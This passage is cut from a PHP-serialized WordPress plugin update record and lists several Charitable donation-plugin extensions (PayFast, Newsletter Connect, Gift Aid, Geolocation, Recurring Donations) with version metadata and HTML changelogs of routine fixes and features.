2017</em></p>\n<ul>\n<li>Added proper support zero-decimal currencies. This will apply to any of the <a href=\"https://support.stripe.com/questions/which-zero-decimal-currencies-does-stripe-support\">zero-decimal currencies supported by Stripe</a>.</li>\n</ul>\n<p>1.0.3<br />\n<em>May 23, 2017</em></p>\n<ul>\n<li>Prevent redirection to Stripe when a non-personal campaign is created.</li>\n<li>Ensure that auto-publishing of campaigns works as expected when a non-personal campaign is created.</li>\n</ul>\n<p>1.0.2<br />\n<em>May 27, 2016</em></p>\n<ul>\n<li>Fix the error message that is displayed after users fail to connect their Stripe account.</li>\n<li>Other minor changes to keep up with updates coming to Charitable</li>\n</ul>\n<p>1.0.1<br />\n<em>May 16, 2016</em></p>\n<ul>\n<li>Round application fees up to the nearest cent to avoid Stripe API errors.</li>\n</ul>\n<p>1.0.0<br />\n<em>May 10, 2016</em></p>\n<ul>\n<li>First release!</li>\n</ul>\n\";}\";}i:10;a:11:{s:11:\"download_id\";s:4:\"6395\";s:4:\"name\";s:18:\"Charitable PayFast\";s:11:\"new_version\";s:5:\"1.3.4\";s:4:\"slug\";s:18:\"charitable-payfast\";s:3:\"url\";s:71:\"https://www.wpcharitable.com/extensions/charitable-payfast/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-07-07 09:03:58\";s:8:\"homepage\";s:59:\"https://www.wpcharitable.com/extensions/charitable-payfast/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"5.4\";s:10:\"charitable\";s:3:\"1.3\";}s:8:\"sections\";s:3463:\"a:2:{s:11:\"description\";s:81:\"<p>Accept donations with PayFast, a leading South African payment processor.</p>\n\";s:9:\"changelog\";s:3323:\"<p>1.3.4<br />\n<em>January 7, 2021</em></p>\n<ul>\n<li>Added missing code libraries.</li>\n</ul>\n<p>1.3.3<br />\n<em>January 6, 2021</em></p>\n<ul>\n<li>Fixed bug preventing recurring donations from being cancelled in Payfast.</li>\n</ul>\n<p>1.3.2<br />\n<em>June 26, 2020</em></p>\n<ul>\n<li>Store the Payfast transaction ID as the Charitable gateway transaction ID.</li>\n<li>Use standard Charitable button classes for the continue to gateway button on the donation processing page.</li>\n</ul>\n<p>1.3.1<br />\n<em>June 5, 2020</em></p>\n<ul>\n<li>Fixes a bug for recurring donations when the cycles field is removed from the arguments sent to Payfast. This does not trigger errors in Payfast\'s sandbox tool, but does in the live payment processing for certain merchants, preventing recurring donations from being processed.</li>\n</ul>\n<p>1.3.0<br />\n<em>June 3, 2020</em></p>\n<ul>\n<li>Add support for limited-term recurring donation lengths (requires Recurring Donations 1.2).</li>\n<li>Added button to the Donation Processing screen for users to click to redirect to Payfast if the browser does not redirect them automatically. This provides a fallback option for donors when there are Javascript errors on the page blocking the form from submitting automatically through Javascript.</li>\n<li>Fixed an issue which would cause signature mismatch errors on Payfast. This was caused by having submitted data with blank spaces before/after the text (i.e. first name with a space after it); this resulted in a signature mismatch since Charitable generated the signature with the blank space included, while Payfast trimmed the blank spaces before generating the signature.</li>\n</ul>\n<p>1.2.1<br />\n<em>September 6, 2019</em></p>\n<ul>\n<li>Fixed issue where WordPress dashboard shows an available update for Charitable Payfast but keeps showing it after updating.</li>\n</ul>\n<p>1.2.0<br />\n<em>May 20, 2019</em></p>\n<ul>\n<li>Added support for Quarterly, Annually and Semi-Annually recurring donations. This requires Charitable Recurring 1.1+, which will be released soon.</li>\n<li>Added support for admin cancellation of recurring donations. This requires Charitable Recurring 1.1+, which will be released soon.</li>\n<li>Removed unused DB_VERSION constant from Charitable_Payfast class.</li>\n</ul>\n<p>1.1.2<br />\n<em>March 26, 2018</em></p>\n<ul>\n<li>Fixed payment processing error with Giving Hand theme.</li>\n</ul>\n<p>1.1.1<br />\n<em>August 29, 2017</em></p>\n<ul>\n<li>Fixed a signature mismatch error that occurs when a campaign title includes special HTML characters.</li>\n</ul>\n<p>1.1.0<br />\n<em>February 7, 2017</em></p>\n<ul>\n<li>Added support for <a href=\"https://www.wpcharitable.com/extensions/charitable-recurring-donations/?utm_source=extension-readme&amp;utm_medium=changelog-tab&amp;utm_campaign=recurring-donations&amp;utm_content=payfast\">Recurring Donations</a>.</li>\n</ul>\n<p>1.0.2<br />\n<em>January 18, 2016</em></p>\n<ul>\n<li>Fixed a bug that would cause a fatal error when PayFast is activated without Charitable being activated first.</li>\n</ul>\n<p>1.0.1<br />\n<em>July 7, 2016</em></p>\n<ul>\n<li>Fixed signature mismatch error</li>\n<li>Updated settings to refer to Passphrase instead of Salt, based on feedback from PayFast support.</li>\n</ul>\n<p>1.0.0<br />\n<em>July 6, 2016</em></p>\n<ul>\n<li>Initial release.</li>\n</ul>\n\";}\";}i:11;a:11:{s:11:\"download_id\";s:4:\"7114\";s:4:\"name\";s:29:\"Charitable Newsletter Connect\";s:11:\"new_version\";s:5:\"2.2.0\";s:4:\"slug\";s:29:\"charitable-newsletter-connect\";s:3:\"url\";s:82:\"https://www.wpcharitable.com/extensions/charitable-newsletter-connect/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-03-29 18:35:50\";s:8:\"homepage\";s:70:\"https://www.wpcharitable.com/extensions/charitable-newsletter-connect/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:1:{s:3:\"php\";s:3:\"5.3\";}s:8:\"sections\";s:5009:\"a:2:{s:11:\"description\";s:142:\"<p>Turn one-time donors into ongoing supporters. Supports MailChimp, Campaign Monitor, MailerLite, ActiveCampaign, MailPoet and Mailster.</p>\n\";s:9:\"changelog\";s:4807:\"<p>2.2.0<br />\n<em>March 31, 2025</em></p>\n<ul>\n<li>Compatibility with Charitable Pro plugin.</li>\n<li>Settings now under \"Marketing\" tab in Charitable Settings area.</li>\n</ul>\n<p>2.1.3<br />\n<em>January 9, 2025</em></p>\n<ul>\n<li>Fix a PHP fatal error.</li>\n</ul>\n<p>2.1.2<br />\n<em>August 5, 2024</em></p>\n<ul>\n<li>Add new hook after adding a new subscriber to a provider list: \'charitable_newsletter_connect_after_add_subscriber\'.</li>\n<li>Ability to add email tags to MailChimp list subscribers via hook/code snippet.</li>\n</ul>\n<p>2.1.1<br />\n<em>June 20, 2024</em></p>\n<ul>\n<li>Fix several PHP errors and warnings.</li>\n</ul>\n<p>2.0.7<br />\n<em>January 5, 2024</em></p>\n<ul>\n<li>Update detection so lists appear in settings dropdown for MailPoet 3+.</li>\n</ul>\n<p>2.0.6<br />\n<em>April 14, 2020</em></p>\n<ul>\n<li>Avoid resending new subscriber notification when a donor was already subscribed to a list.</li>\n</ul>\n<p>2.0.5<br />\n<em>April 2, 2020</em></p>\n<ul>\n<li>Include the list names for a campaign in the Campaigns export.</li>\n</ul>\n<p>2.0.4<br />\n<em>January 21, 2020</em></p>\n<ul>\n<li>Correctly use the default list when a campaign does not have previously saved newsletter settings.</li>\n</ul>\n<p>2.0.3<br />\n<em>November 1, 2019</em></p>\n<ul>\n<li>Respect the setting for opt-in mode when using Contact Consent.</li>\n</ul>\n<p>2.0.2<br />\n<em>June 21, 2019</em></p>\n<ul>\n<li>MailChimp: Fixed method for getting all lists.</li>\n<li>MailChimp: Added inline notice to merge fields that are required.</li>\n<li>MailChimp: When a merge field has a default value defined, allow that to be used instead of any Charitable donation field.</li>\n</ul>\n<p>2.0.1<br />\n<em>June 17, 2019</em></p>\n<ul>\n<li>Fix fatal errors when certain providers are not set up or configured.</li>\n</ul>\n<p>2.0.0<br />\n<em>June 11, 2019</em></p>\n<ul>\n<li>Integrate newsletter signup with the Contact Consent feature built into Charitable. Newsletter Connect leverages this field and makes it more powerful, automatically adding donors who agree to be contacted to your mailing lists.</li>\n<li>User Privacy: Added tools for exporting and erasing personal data. These are built on top of WordPress\' core user privacy tools.</li>\n<li>MailChimp: Added list-specific settings for marketing permissions and merge fields. You can now specify how donation fields in Charitable should map to MailChimp\'s merge fields.</li>\n<li>MailChimp: Fixed a bug preventing all lists from being displayed if you have more than ten lists.</li>\n<li>Campaign Monitor: Specify how donation fields in Charitable should map to Campaign Monitor\'s custom fields.</li>\n<li>Campaign Monitor: Added support for Campaign Monitor\'s \"Consent to Track\" field.</li>\n<li>MailerLite: Specify how donation fields in Charitable should map to MailerLite\'s subscriber fields.</li>\n<li>MailPoet 3: Specify how donation fields in Charitable should map to MailPoet\'s custom fields.</li>\n<li>Mailster: Specify how donation fields in Charitable should map to Mailster\'s custom fields.</li>\n<li><a href=\"https://activecampaign.com\" target=\"_blank\" rel=\"noopener\">ActiveCampaign</a>: Support added!</li>\n<li>Removed unused `Charitable_Newsletter_Connect_Campaign` class.</li>\n</ul>\n<p>1.2.0<br />\n<em>November 28, 2017</em></p>\n<ul>\n<li>Added support for <a href=\"https://codecanyon.net/item/mailster-email-newsletter-plugin-for-wordpress/3078294?ref=Studio164a\" target=\"_blank\" rel=\"noopener\">Mailster</a> (formerly MyMail).</li>\n<li>Added support for <a href=\"http://www.mailerlite.com/a/2zglls1ali\" target=\"_blank\" rel=\"noopener\">MailerLite</a>.</li>\n</ul>\n<p>1.1.1<br />\n<em>August 1, 2017</em></p>\n<ul>\n<li>Prevent admin crashing when a request to Campaign Monitor API times out or fails.</li>\n</ul>\n<p>1.1.0<br />\n<em>July 11, 2017</em></p>\n<ul>\n<li>Added Campaign Monitor support.</li>\n<li>Also added support for MailPoet 3.</li>\n<li>Choose from three opt-in modes for donors:\n<ol>\n<li>An opt-in checkbox in the donation form which <em>isn\'t</em> checked by default.</li>\n<li>An opt-in checkbox in the donation form which <em>is</em> checked by default.</li>\n<li>Automatic opt-in. Donors are automatically subscribed when they donate.</li>\n</ol>\n</li>\n<li>Re-sync lists from MailChimp and Campaign Monitor on demand.</li>\n<li>Provide feedback when an incorrect/invalid API key is entered for MailChimp or Campaign Monitor.</li>\n</ul>\n<p>1.0.2<br />\n<em>March 2, 2017</em></p>\n<ul>\n<li>Added sanitization to make sure that when newsletter signups are disabled for a specific campaign, that is shown correctly in the admin.</li>\n</ul>\n<p>1.0.1<br />\n<em>November 16, 2016</em></p>\n<ul>\n<li>Fixed a fatal error due to invalid PHP syntax.</li>\n</ul>\n<p>1.0.0<br />\n<em>November 4, 2016</em></p>\n<ul>\n<li>Initial release with support for MailPoet and MailChimp.</li>\n</ul>\n\";}\";}i:12;a:11:{s:11:\"download_id\";s:5:\"13979\";s:4:\"name\";s:19:\"Charitable Gift Aid\";s:11:\"new_version\";s:5:\"1.2.0\";s:4:\"slug\";s:19:\"charitable-gift-aid\";s:3:\"url\";s:72:\"https://www.wpcharitable.com/extensions/charitable-gift-aid/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-05-13 09:00:38\";s:8:\"homepage\";s:60:\"https://www.wpcharitable.com/extensions/charitable-gift-aid/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:0:{}s:8:\"sections\";s:2723:\"a:2:{s:11:\"description\";s:84:\"<p>Boost your donations by 25% with Gift Aid, a tax incentive for UK charities.</p>\n\";s:9:\"changelog\";s:2580:\"<p>1.2.0<br />\n<em>May 12, 2025</em></p>\n<ul>\n<li>Resolves issue showing Gift Aid with recurring donations in donation detail and donation listing page.</li>\n</ul>\n<p>1.1.7<br />\n<em>January 13, 2025</em></p>\n<ul>\n<li>CSS Tweaks for the display in the donation form.</li>\n</ul>\n<p>1.1.6<br />\n<em>July 19, 2024</em></p>\n<ul>\n<li>Made the checkbox Gift Aid exposured as an email claim. You can now include in emails if the Gift Aid was \"Claimed\" or \"Not Claimed\".</li>\n</ul>\n<p>1.1.5<br />\n<em>October 20, 2022</em></p>\n<ul>\n<li>Fixed an issue with donation reporting where start and end dates weren\'t inclusive.</li>\n</ul>\n<p>1.1.4<br />\n<em>September 5, 2020</em></p>\n<ul>\n<li>Fixes a fatal error encountered when Charitable is not active and no other extensions are installed.</li>\n</ul>\n<p>1.1.3<br />\n<em>January 14, 2020</em></p>\n<ul>\n<li>Previous release didn\'t include the fix.</li>\n</ul>\n<p>1.1.2<br />\n<em>January 13, 2020</em></p>\n<ul>\n<li>Store the third address and donor title fields in the donor meta, instead of as standalone meta fields.</li>\n</ul>\n<p>1.1.1<br />\n<em>September 3, 2019</em></p>\n<ul>\n<li>Fixes a fatal error when viewing recurring donation receipts, related to how the Gift Aid is shown.</li>\n<li>Store the Gift Aid agreement text that donors agree to.</li>\n</ul>\n<p>1.1.0<br />\n<em>March 11, 2019</em></p>\n<ul>\n<li>Display Gift Aid in the admin donation details page.</li>\n<li>Include Gift Aid in the donation amount in the Donation Receipt email with the following shortcode: [charitable_email show=donation_amount include_giftaid=1]</li>\n<li>Filter donations in the admin donations table by whether Gift Aid was claimed.</li>\n<li>Display Gift Aid amount in the user donations table ([charitable_my_donations]).</li>\n<li>Show the Gift Aid amount in the donation receipt page.</li>\n<li>Added an option to show the Gift Aid amount in the Donation Stats widget.</li>\n<li>Added an option to show the Gift Aid amount in the Donors widget.</li>\n<li>Added an option to show the Gift Aid amount in Campaign pages as part of the funds raised.</li>\n<li>Fixed a bug preventing the Gift Aid report from including more than five records.</li>\n<li>Removed unused DB_VERSION constant from Charitable_GiftAid class.</li>\n</ul>\n<p>1.0.1<br />\n<em>May 15, 2017</em></p>\n<ul>\n<li>Include whether Gift Aid was claimed in the data that is sent to Stripe.</li>\n<li>Removed erroneous link to settings from plugins page.</li>\n</ul>\n<p>1.0.0<br />\n<em>October 27, 2016</em></p>\n<p>Hello UK charities — I\'m here to help you boost your donations by 25%, instantly!</p>\n\";}\";}i:13;a:11:{s:11:\"download_id\";s:5:\"23988\";s:4:\"name\";s:22:\"Charitable Geolocation\";s:11:\"new_version\";s:5:\"1.2.0\";s:4:\"slug\";s:22:\"charitable-geolocation\";s:3:\"url\";s:75:\"https://www.wpcharitable.com/extensions/charitable-geolocation/?changelog=1\";s:12:\"last_updated\";s:19:\"2024-09-17 13:38:37\";s:8:\"homepage\";s:63:\"https://www.wpcharitable.com/extensions/charitable-geolocation/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:1:{s:10:\"charitable\";s:5:\"1.7.0\";}s:8:\"sections\";s:2134:\"a:2:{s:11:\"description\";s:75:\"<p>Set a location for your campaigns, and display them on a Google Map</p>\n\";s:9:\"changelog\";s:2000:\"<p>1.2.0<br />\n<em>November 1, 2023</em></p>\n<ul>\n<li>Updates related to Campaign Builder release in Charitable 1.8.0.</li>\n</ul>\n<p>1.1.8<br />\n<em>January 13, 2021</em></p>\n<ul>\n<li>Fixed issue related to apostrophes in campaign descriptions.</li>\n</ul>\n<p>1.1.7<br />\n<em>March 18, 2020</em></p>\n<ul>\n<li>Fixes a bug preventing campaigns map from loading when a campaign has an address with an apostrophe in it.</li>\n</ul>\n<p>1.1.6<br />\n<em>April 19, 2018</em></p>\n<ul>\n<li>Improved how the map map Javascript is loaded to avoid compatibility issues with other plugins and themes.</li>\n</ul>\n<p>1.1.5<br />\n<em>March 28, 2018</em></p>\n<ul>\n<li>Fixed another issue causing double quotes in campaign descriptions to break the map.</li>\n</ul>\n<p>1.1.4<br />\n<em>February 9, 2017</em></p>\n<ul>\n<li>Fixed issue where apostrophes in campaign descriptions break the map.</li>\n<li>Removed error logging left over from testing.</li>\n</ul>\n<p>1.1.3<br />\n<em>November 6, 2017</em></p>\n<ul>\n<li>Correctly center a map based on the markers.</li>\n<li>Set a more sensible default center, based on the user\'s location (if on https) or the site\'s default country (set under Charitable &gt; Settings &gt; General).</li>\n</ul>\n<p>1.1.2<br />\n<em>April 3, 2017</em></p>\n<ul>\n<li>The previous version didn\'t set the version correctly inside the plugin, which resulted in an update notice always being displayed, even if you had already upgraded. Sorry about that if you\'ve been caught in the spiral!</li>\n</ul>\n<p>1.1.1<br />\n<em>March 31, 2017</em></p>\n<ul>\n<li>Fixed a bug that prevented the map from loading in the campaign form when no zoom level is set.</li>\n</ul>\n<p>1.1.0<br />\n<em>October 26, 2016</em></p>\n<ul>\n<li><strong>Official public release</strong>Compared with version 1.0.0, the major new addition in this release is the addition of a location search feature, built on top of the Google Places Autosuggest API. This makes it much easier to find and enter the location for your campaign.</li>\n</ul>\n\";}\";}i:14;a:11:{s:11:\"download_id\";s:5:\"26609\";s:4:\"name\";s:30:\"Charitable Recurring Donations\";s:11:\"new_version\";s:5:\"1.4.2\";s:4:\"slug\";s:30:\"charitable-recurring-donations\";s:3:\"url\";s:83:\"https://www.wpcharitable.com/extensions/charitable-recurring-donations/?changelog=1\";s:12:\"last_updated\";s:19:\"2025-04-01 09:16:40\";s:8:\"homepage\";s:71:\"https://www.wpcharitable.com/extensions/charitable-recurring-donations/\";s:7:\"package\";s:15:\"missing_license\";s:13:\"download_link\";s:15:\"missing_license\";s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"5.3\";s:10:\"charitable\";s:6:\"1.6.51\";}s:8:\"sections\";s:15841:\"a:2:{s:11:\"description\";s:66:\"<p>Grow your organization\'s revenue with recurring donations.</p>\n\";s:9:\"changelog\";s:15715:\"<p>1.4.2<br />\n<em>March 31, 2025</em></p>\n<ul>\n<li>Updated for Charitable Pro.</li>\n<li>Fix translation issue with donation periods.</li>\n</ul>\n<p>1.4.1.3<br />\n<em>February 24, 2025</em></p>\n<ul>\n<li>Fix: Resolve a reported fatal error involving PayPal recurring donation processing.</li>\n</ul>\n<p>1.4.1.2<br />\n<em>February 19, 2025</em></p>\n<ul>\n<li>Fix: Remove error on legacy involving period options to display feature introduced in 1.4.1.</li>\n</ul>\n<p>1.4.1.1<br />\n<em>October 30, 2024</em></p>\n<ul>\n<li>Fix: Resolve a hidden manual add donation button issue in certain scenarios.</li>\n</ul>\n<p>1.4.1<br />\n<em>October 24, 2024</em></p>\n<ul>\n<li>NEW: Ability to decide what period options (monthly, daily, weekly) in the donation form on a per campaign basis. This option is currently only available in the visual campaign builder.</li>\n</ul>\n<p>1.4.0.4<br />\n<em>September 27, 2024</em></p>\n<ul>\n<li>Fixes a bug where an activation setting wasn\'t being saved property in the visual builder, resulting in recurring sometimes not appearing on donation forms.</li>\n</ul>\n<p>1.4.0.3<br />\n<em>June 19, 2024</em></p>\n<ul>\n<li>Adds a \"post parent\" / recurring donation box to edit donation pages to manually associate a donation to a recurring donation.</li>\n</ul>\n<p>1.4.0.2<br />\n<em>June 3, 2024</em></p>\n<ul>\n<li>Tweaks export data for export on donations and recurring donation pages in Charitable admin.</li>\n</ul>\n<p>1.4.0.1<br />\n<em>May 2, 2024</em></p>\n<ul>\n<li>Adds \"Recurring Donations\" report to \"Advanced\" in Charitable Reports (requires 1.8.1+ and valid license activated).</li>\n</ul>\n</ul>\n<p>1.4.0<br />\n<em>April 30, 2024</em></p>\n<ul>\n<li>Adds \"Recurring Donations\" report to \"Advanced\" in Charitable Reports (requires 1.8.1+ and valid license activated).</li>\n</ul>\n<p>1.3.3<br />\n<em>November 27, 2023</em></p>\n<ul>\n<li>Updated tool tips.</li>\n</ul>\n<p>1.3.2<br />\n<em>November 2, 2023</em></p>\n<ul>\n<li>Added a check for the campaign_is_campaign_builder_admin_page function for those who haven\'t updated to Charitable 1.8.0.</li>\n</ul>\n<p>1.3.0<br />\n<em>November 1, 2023</em></p>\n<ul>\n<li>Updates related to Campaign Builder release in Charitable 1.8.0.</li>\n</ul>\n<p>1.2.21<br />\n<em>April 18, 2023</em></p>\n<ul>\n<li>Fix: Resolved a PHP warning by adding an additional check in the charitable_recurring_get_donation_period_adverb function.</li>\n<li>Fix: Unchecking/checking allow recurring donations in campaign settings now saves more reliability.</li>\n</ul>\n<p>1.2.20<br />\n<em>April 5, 2022</em></p>\n<ul>\n<li>Fix: Load the vendors/autoload.php file with an absolute path, instead of a relative path. While this worked fine for most sites, in some rare cases it could cause an error.</li>\n</ul>\n<p>1.2.19<br />\n<em>March 29, 2022</em></p>\n<ul>\n<li>Fix: When a recurring donation amount has been pre-set while using Advanced mode, submitting the donation form was blocked with a message that the donor needed to give more than $0.</li>\n</ul>\n<p>1.2.18<br />\n<em>February 22, 2022</em></p>\n<ul>\n<li>Fix: When loading a donation form via ajax on sites where the form is set to show in modals, a fatal error would occur.</li>\n</ul>\n<p>1.2.17<br />\n<em>February 11, 2022</em></p>\n<ul>\n<li>In combination with Charitable 1.6.55, this will add compatibility with block themes such as Twenty Twenty Two.</li>\n<li>Fix: Correctly display the recurring donation total in sites where the comma is used as the decimal separator.</li>\n</ul>\n<p>1.2.16<br />\n<em>December 20, 2021</em></p>\n<ul>\n<li>Fix: Ensure that template functions are loaded in the admin to avoid fatal errors in block editor or Elementor.</li>\n</ul>\n<p>1.2.15<br />\n<em>November 12, 2021</em></p>\n<ul>\n<li>Fix: When the next renewal date is calculated for a recurring donation, base it on the most recent donation made as part of that recurring donation, to avoid problems where the next donation date shown in the recurring donation receipt is incorrect.</li>\n<li>Fix: Provides backwards compatibility for versions of Charitable prior to 1.6.54. Without this, there were errors, particularly on the donation receipt.</li>\n<li>Fix: On sites where pretty permalinks are turned off, there was previously a fatal error on the recurring donation receipt page.</li>\n<li>Fix: If a recurring donation is deleted, the donation receipt page on the front-end for any donation made as part of that recurring donation previously showed a fatal error. This is now resolved, with no details about the recurring donation shown (since none are available).</li>\n<li>Fix: Correctly set the `post_author` for each recurring donation to the donor\'s user ID. Previously this was incorrectly recorded as the donor\'s donor ID, which is a separate ID. However, the `post_author` field is never displayed for donations, so this had minimal impact. A migration script has been added to update all past renewal donations to have the same `post_author` value as the original recurring donation.</li>\n</ul>\n<p>1.2.14<br />\n<em>October 26, 2021</em></p>\n<ul>\n<li>Fix: Correctly set the default donation period for recurring donations when donors can choose their preferred frequency.</li>\n<li>Fix: There was a bug preventing the custom recurring donations option from being turned off.</li>\n</ul>\n<p>1.2.13<br />\n<em>October 22, 2021</em></p>\n<ul>\n<li>Fix: There were a number of small issues with the way the donation form looked for campaigns where donors can choose how frequently they would like their donation to renew.</li>\n<li>Developers: Added easier ways to retrieve the total lifetime amount donated as part of a recurring donation, including a separate option to get the total lifetime amount without any donation fees included. Charitable_Recurring_Donation::get_total() returns the total including fees. Charitable_Recurring_Donation::get_subtotal() returns the total without fees.</li>\n<li>Deprecated: The Charitable_Recurring_Related_Donations_Query has been deprecated. Use Charitable_Donations_Query instead.</li>\n</ul>\n<p>1.2.12<br />\n<em>August 17, 2021</em></p>\n<ul>\n<li>Fix: Avoid HTML validation error blocking donations in certain situations.</li>\n<li>Fix: Resolved a number of issues causing warnings and notices with PHP 8.</li>\n<li>Fix: Adjusted how recurring campaign configuration is saved to ensure it works better with Charitable Ambassadors.</li>\n</ul>\n<p>1.2.11<br />\n<em>July 23, 2021</em></p>\n<ul>\n<li>Fix: Due to changes in Charitable 1.6.51, one-time donations made for campaigns with recurring donations enabled in Simple mode (i.e. showing a \"make it monthly\" checkbox or similar), were incorrectly saved as recurring donations.</li>\n</ul>\n<p>1.2.10<br />\n<em>July 21, 2021</em></p>\n<ul>\n<li>Fix: Depending on the payment gateway and settings used, the next charge date for recurring donations as shown in the donation receipt was incorrect.</li>\n</ul>\n<p>1.2.9<br />\n<em>July 20, 2021</em></p>\n<ul>\n<li>Fix: Ensure recurring donation fields in the donation form are validated with the form validation built into Charitable.</li>\n</ul>\n<p>1.2.8<br />\n<em>June 29, 2021</em></p>\n<ul>\n<li>Fix: In campaigns where recurring donations was enabled in Advanced mode, with no suggested recurring donations but custom amounts enabled, recurring donations were blocked with a message about needing to donate at least $0.</li>\n</ul>\n<p>1.2.7<br />\n<em>June 10, 2021</em></p>\n<ul>\n<li>Fix: Minor change to ensure the plugin remains compatible with PHP 5.3. Please note that the minimum update requirements will be changed in future versions.</li>\n</ul>\n<p>1.2.6<br />\n<em>June 9, 2021</em></p>\n<ul>\n<li>Fix: Prevent duplicate sanitization of donation amounts, resulting in incorrect amounts.</li>\n<li>Fix: Use the localized money format in the donation form for pre-set amounts.</li>\n</ul>\n<p>1.2.5<br />\n<em>June 1, 2021</em></p>\n<ul>\n<li>Fix: PayPal recurring donations were not being marked as Active correctly.</li>\n<li>Fix: Avoid broken HTML when viewing recurring donations in the admin while using Fee Relief.</li>\n<li>Fix: Avoid errors related to unsanitized donation amounts.</li>\n</ul>\n<p>1.2.4<br />\n<em>February 17, 2021</em></p>\n<ul>\n<li>Fix: One-time donations were blocked when using recurring donations in Advanced mode and allowing donors to choose a period AND when the default period was one-time donations.</li>\n</ul>\n<p>1.2.3<br />\n<em>December 8, 2020</em></p>\n<ul>\n<li>Fix: Allow custom recurring donations to be disabled when suggested recurring donation amounts have been provided.</li>\n</ul>\n<p>1.2.2<br />\n<em>November 30, 2020</em></p>\n<ul>\n<li>Fix: Minor version bump to fix issue with bundling of previous release.</li>\n</ul>\n<p>1.2.1<br />\n<em>November 27, 2020</em></p>\n<ul>\n<li>Fix: Load the translation files earlier to void problems with text not translating.</li>\n</ul>\n<p>1.2.0<br />\n<em>October 7, 2020</em></p>\n<ul>\n<li>New: Add variable donation period support for \"Advanced\" mode (ie: suggested recurring amounts).</li>\n<li>New: Add donation length support.</li>\n<li>Fix: Use the Charitable default donation amount filter, unless overriden with recurring default donation amount filter.</li>\n<li>Fix: Display of suggested amounts table in campaign metabox</li>\n<li>Fix: Incorrect validation of custom recurring field when one-time donations are disabled.</li>\n<li>Fix: Undefined \'date\' key in the donation processor. Allows support for generating renewals from a time other than current time</li>\n<li>Fix: Sanitize dates passed to charitable_recurring_donation_renewal_expiration($date).</li>\n<li>Notice: Soft deprecate charitable_recurring_donation_renewal_expiration. Use $donation-&gt;update_expiration_date( \'YYYY-MM-DD\' ); instead.</li>\n</ul>\n<p>1.1.7<br />\n<em>Dec 9, 2019</em></p>\n<ul>\n<li>Fix: Detect when recurring_donations endpoint is a descendant of the profile endpoint.</li>\n</ul>\n<p>1.1.6<br />\n<em>Nov 27, 2019</em></p>\n<ul>\n<li>Fix: Remove stray %s string from time periods</li>\n</ul>\n<p>1.1.5<br />\n<em>Nov 20, 2019</em></p>\n<ul>\n<li>Fix the \"$99 / 1 month\" phrasing in the donation form.</li>\n<li>Fix the $0 total in export.</li>\n</ul>\n<p>1.1.4<br />\n<em>Nov 5, 2019</em></p>\n<ul>\n<li>Fix: An overly strict check caused PayPal recurring donations to be incorrectly marked as Failed. Please note that this did not affect the actual renewal transaction, only how it was recorded in Charitable.</li>\n<li>Fix: Error caused non-monthly recurring donations to not work as expected.</li>\n</ul>\n<p>1.1.3<br />\n<em>Oct 27, 2019</em></p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Fix: Undefined variable $form_id in recurring donation amount template.</li>\n<li>Fix: Make second arg optional for Charitable_Recurring_My_Recurring_Donations:add_to_my_donations()</li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;<br />\n1.1.2<br />\n<em>Oct 15, 2019</em></p>\n<ul>\n<li>IMPORTANT: Requires Charitable 1.6.15!</li>\n<li>New: Allow total donation amount to be filtered in tables, for compatibility with GiftAid.</li>\n<li>New: Register admin action for resending Cancelled subscription notification.</li>\n<li>Fix: Cancelled email now fired on correct trigger.</li>\n<li>Fix: Make recurring donation receipt accessible for logged out users.</li>\n<li>Fix: Adds singular.php as a fallback template before index.php for endpoints.</li>\n<li>Fix: problems with setting the donation period in the session.</li>\n<li>Fix: Correct calculation of future quarter and biannual dates.</li>\n<li>Fix: Allow campaigns to be created without any one-time donation option.</li>\n<li>Fix: Few minor translation errors.</li>\n<li>Fix: Don\'t show upgrade notices on new installs.</li>\n</ul>\n<p>1.1.1<br />\n<em>June 26, 2019</em></p>\n<ul>\n<li>New: `charitable_recurring_donation_amount` filter for modifying the donation amount.</li>\n<li>Fix: Allow default period to be set for campaign in variable period mode.</li>\n<li>Fix: Restore option for default tab in advanced mode.</li>\n<li>Fix: Don\'t send regular donation emails for new recurring donations.</li>\n<li>Fix: Make Recurring Donation Receipt available without logging in.</li>\n<li>Fix: Fetch suggested amounts via ajax when no session ID is set.</li>\n</ul>\n<p>1.1.0<br />\n<em>May 21, 2019</em></p>\n<ul>\n<li>IMPORTANT: Requires Charitable 1.6.15!</li>\n<li>NEW: Accept recurring donations in different periods! Now supports: monthly, quarterly, semi-annually, and annually</li>\n<li>NEW: Cancel recurring donations from admin or from user\'s My Donations area when the payment gateway supports it.</li>\n<li>NEW: Automatically link to donor\'s My Recurring Donations from [charitable_my_donations] shortcode.</li>\n<li>New: Shortcode `[charitable_recurring_my_recurring_donations]` for specifically displaying the donor\'s recurring donations</li>\n<li>New: Endpoints for displaying a Recurring Donations details to user.</li>\n<li>New: Donor email notification when a Recurring Donation is cancelled</li>\n<li>IMPORTANT: Rewrite Charitable_Recurring_Donation_Processor. No longer a singleton class and instances should not be created. To create a new recurring donation use `charitable_create_donation()`.</li>\n<li>IMPORTANT: Related to above, the `charitable_recurring_donation_values` filter has been removed. You should should the `charitable_donation_values` filter instead.</li>\n<li>Register campaign metabox fields via Charitable_Campaign_Field API</li>\n</ul>\n<p>1.0.7<br />\n<em>October 4, 2017</em></p>\n<ul>\n<li>Shorten titles of donation tabs to improve widget appearance.</li>\n<li>Prepare for parameter change in charitable_session_donation_amount_formatted filter in Charitable 1.5.0.</li>\n<li>Check that get_current_screen() doesn\'t return null to prevent PHP notices in admin</li>\n</ul>\n<p>1.0.6<br />\n<em>September 4, 2017</em></p>\n<ul>\n<li>Fix: Invalid HTML in recurring donations tab.</li>\n<li>Fix: Permissions error with export of recurring donations.</li>\n<li>Fix: Fatal error with export of recurring donations.</li>\n<li>New: Add charitable_donation_export_report_types filter to extend export report types for recurring donations.</li>\n</ul>\n<p>1.0.5<br />\n<em>June 9, 2017</em></p>\n<ul>\n<li>Allow recurring donations tab to be set as default 